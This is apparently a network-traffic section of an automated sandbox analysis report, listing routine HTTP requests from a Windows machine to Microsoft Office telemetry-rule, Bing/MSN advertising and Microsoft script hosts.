              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8-rxPAXyoVMIT7WO3fmyzYDVUCUwhOSRqF271Ti6g8BWCwyjXBAKy25hyd8_CTi1NuSmCNn9qyOzRYARW9TPN7DuKIBWrrjD3U_Qy06pFM7ZfyYBTi3TahMjZz7hCNLrUqgNzT5cLK5_bmCHay2tVrl6XE609ivIJVvn1ki0CGUDKtf56%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3Db5427d1f27bf1c3838471a2067559285&TIME=20241121T141739Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141737Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=132296fb9da74bb39fbb4e2f0c27504a&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-88000045&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=Cache-Control: no-cacheMS-CV: 7mKNM1Tl1UG+yoGB.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aes/c.gif?RG=41c7e0b79ab94421a2b63b416764f363&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241121T141739Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: www.bing.comConnection: Keep-AliveCookie: MUID=30952A2DA9F56E753E2F3F13A8976F69
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T141744Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=811b8ccc6679466eb8851725c78cd000&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=595199&metered=false&nettype=ethernet&npid=sc-88000045&oemName=xtfsrp%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=xtfsrp20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=595199&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZ1hoi1TzaYpzVzVd+YEO56cZ06MOdgqXgXAos1MJlN20gETlA48eLOMymFJLsl3BR1xoa0l1AqAc1pL5sh92Wgv6yvNuk1kRRInCLjTHwSOB+mN4vbAGUcSb2inNrqBd6MrjdXVkRBeP9lXgilXe2QNa1DQCAM3N2SEx7JT5JOBvnF2NZjoOYwIm+8ouLgbnZrw8Z8oab5XNr1HLO65qqsvrynoNCHPogROjeI7uCNqb4bGLh6mXzcbfXd/B+iLou/WeT0DyeHD7YG8I/ToyDfN3baS69B6WQAwym8CSQ4ZGFVnHigaFfNozHq/m68FrSCq9Xv8TsYixg0Dz4ydktUQZgAAENsn+FRgDYzoKBOtorl4m9+wAapqjQaDu+Dz+yVDGoijJGrwI+6mOv664qFYWyNpBwuFyN4OdbOEpMfpuY2ZbDeSLuh6HFg4P4/gSythZxQsr8wwLZrL7UxeGeBGLRE1GjFb0XgG2VFXdT67wmiNey8AH+0+m765xGPQvwy5Scuvl8aVDmqCzhvAV4keSNAiO2zOGhim3Os88URW5QivJrK5A1B2HRNAt8VaUZp3fYAkBSa2wvL02sGuMG9Hi/sZPE174dpatWV7tRwBaKyN0exLVGaacui0/CgALd71JhdDj1Gz1l7Wwb+0C6lKHirvEHmlLp74U8tl5ywjNsW0JZcK1ti63RmJoMtxxclpLtUG9Smc4PpdMpGAcRXKEysRk1jjspgc01o6F6RoQsMMLImPyvhGK8VkLXoCT+HhU4g0W2sP/z4fEB1JnjvGdcHL3VHB6qyY54yA3I8bo2DccoyYV/Q1geED7tkJidBeEQDK+Mw/IUOmLEpzPZs7N3C7+xkLt3oAICwbZh2mZ5DAZpFyolUFsQXtfX2jpJZ2BR82Tr+TH1kmH67fDoLLv6ojmAgYVDUL3hfqUzIkgtj6QrnfQdcB&p=Cache-Control: no-cacheMS-CV: 7mKNM1Tl1UG+yoGB.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8-rxPAXyoVMIT7WO3fmyzYDVUCUwhOSRqF271Ti6g8BWCwyjXBAKy25hyd8_CTi1NuSmCNn9qyOzRYARW9TPN7DuKIBWrrjD3U_Qy06pFM7ZfyYBTi3TahMjZz7hCNLrUqgNzT5cLK5_bmCHay2tVrl6XE609ivIJVvn1ki0CGUDKtf56%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3Db5427d1f27bf1c3838471a2067559285&TIME=20241121T141739Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=30952A2DA9F56E753E2F3F13A8976F69; _EDGE_S=SID=1B1737814BED6B923F2F22BF4A416AEE; MR=0
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
